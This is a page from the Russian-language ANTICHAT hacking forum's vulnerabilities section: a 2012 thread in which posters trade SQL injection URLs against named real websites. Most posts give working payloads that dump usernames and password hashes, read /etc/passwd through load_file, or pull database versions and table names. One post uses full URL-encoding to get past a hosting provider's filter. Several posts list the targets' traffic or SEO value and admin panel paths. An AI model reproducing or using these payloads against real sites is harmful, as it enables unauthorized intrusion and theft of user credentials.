HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15191  
Старый 09.08.2012, 21:51
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

Небольшая подборка.

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.conciergequestionnaire.com/ur_here/story.php?id=-196+union+select+concat_ws(0x03a,table_schema,table_name,column_name),2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns --[/COLOR][/COLOR] 
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.gumblossombabies.com/item.php?itemid=-1+union+select+1,2,3,4,5,load_file('/etc/passwd'),7--[/COLOR][/COLOR] 
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//qiyuangh.g.178.com/main.php?act=charactorlist&user_id=1+and+extractvalue(rand(),concat(0x3a,(select+concat(0x3a,table_name)+from+information_schema.tables+limit+0,1)))[/COLOR][/COLOR] 
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]https[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.nensa.net/calendar/index.html?id=-1252+union+select+1,2,concat_ws(0x03a,ID,user_login,user_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+nensa_forum.wp_users--[/COLOR][/COLOR] 
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//pazoogle.com/grafton-hills/Admin/getFile.php?db=sites&table=siteMediaFiles&fileId=-411'+/*!union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13*/--+h[/COLOR][/COLOR] 
 
Ответить с цитированием

  #15192  
Старый 11.08.2012, 05:14
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию

Скулю 10 года пофиксили, но нарастили пузомерки и открыли новые доступы (=

Яндекс тИЦ: 100

Page Rank: 4

Яндекс Каталог: True

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.magniflex.ru/shop/checkout2.php?id=3+AND+extractvalue(1,user())+--+[/COLOR][/COLOR] 
 
Ответить с цитированием

  #15193  
Старый 15.08.2012, 13:26
StaD
Guest
Сообщений: n/a
Провел на форуме:
1062

Репутация: 0
По умолчанию

SQL 4.1.22 => таблицы подбираем

Код:
Code:
http://tvpc.com/Channel.php?ChannelID=1+UNION+SELECT+1,2,ChannelID,4,5,ChannelPassword,7,version(),9+from+Channels+LIMIT+0,1
 
Ответить с цитированием

  #15194  
Старый 15.08.2012, 13:30
StaD
Guest
Сообщений: n/a
Провел на форуме:
1062

Репутация: 0
По умолчанию

Таблицы:

Код:
Code:
http://www.price62.ru/newsorg/?year=-1)+UNION+SELECT+1,2,TABLE_NAME,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.TABLES+--
Колонки:

Код:
Code:
http://www.price62.ru/newsorg/?year=-1)+UNION+SELECT+1,2,COLUMN_NAME,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x...+--
 
Ответить с цитированием

  #15195  
Старый 15.08.2012, 16:30
bodrich
Guest
Сообщений: n/a
Провел на форуме:
5709

Репутация: 0
По умолчанию

20к траффика

http://www.zavarka.ru/texts/cgi-bin/show.cgi?id=1+union+select+1,version(),3,4,5,6,7,8 +--+

админка /admin/admin.php
 
Ответить с цитированием

  #15196  
Старый 17.08.2012, 17:52
DyukiN
Guest
Сообщений: n/a
Провел на форуме:
74477

Репутация: 21
По умолчанию

Цитата:
Сообщение от None  
http://www.fitnesshut.pt/clube.php?id=-1/**/union/**/select/**/1,concat_ws(user(),database(),version()),3--
PR3 AR516,938

fitnetj3_websitefitnetj3_admin@localhost5.1.63-community-log
 
Ответить с цитированием

  #15197  
Старый 19.08.2012, 01:38
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

Цитата:
Сообщение от None  
http://www.kitefestpasirgudang.com/Content.php?id=-2+union+select+concat_ws%280x3a,member_id,member_l ogin,member_password%29,2,3,4+from+members%20limit %200,1--
Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 4 символов.

Цитата:
Сообщение от None  
http://www.hsabc.org/content.php?id=-10+union+select+1,2,concat%28password,0x3a,usernam e%29,4,5,6,7,8,9,10,11,12,13,14+from+members--
 
Ответить с цитированием

  #15198  
Старый 20.08.2012, 14:49
.Varius
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
Провел на форуме:
5777251

Репутация: 796


По умолчанию

http://www.sprusk.spb.ru/index.php?page_id=4+%61%6e%64%20%30%20%75%6e%69%6f %6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2 c%35%2c%36%2c%37%2c%38%2c%39%2c%30%2c%31%2c%32%2c% 33%2d%2d%20%31​

pеtеrhost обходится полным urlencode запроса

http://www.sprusk.spb.ru/index.php?page_id=4+%61%6e%64%20%30%20%75%6e%69%6f %6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2 c%35%2c%63%6f%6e%63%61%74%5f%77%73%28%30%78%33%61% 2c%75%73%65%72%6e%61%6d%65%2c%75%73%65%72%5f%70%61 %73%73%77%6f%72%64%29%2c%37%2c%38%2c%39%2c%30%2c%3 1%2c%32%2c%33%20%66%72%6f%6d%20%70%68%70%62%62%5f% 75%73%65%72%73%20%6c%69%6d%69%74%20%31%2c%31%2d%2d %20%31​
 
Ответить с цитированием

  #15199  
Старый 24.08.2012, 12:14
DyukiN
Guest
Сообщений: n/a
Провел на форуме:
74477

Репутация: 21
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.revistaklan.com/material.php?id=-1074%27+union+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9,10,11,12,13,14,15,16,17--+f[/COLOR][/COLOR] 
ТИЦ-10(R2) PR-5 AR-811,760DMOZ
 
Ответить с цитированием

  #15200  
Старый 24.08.2012, 20:33
Unknown
Guest
Сообщений: n/a
Провел на форуме:
925

Репутация: 5
По умолчанию

Интернет магазин техники - NewComp. Админы были поставлены в известность, но никакой реакции.

Login:

Код:
Code:
http://new comp.dp.ua/ ?d=-1+union+select+login+fr om+users+--+
Password:

Код:
Code:
http://new comp.dp.ua/ ?d=-1+union+select+password+fr om+users+--+
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ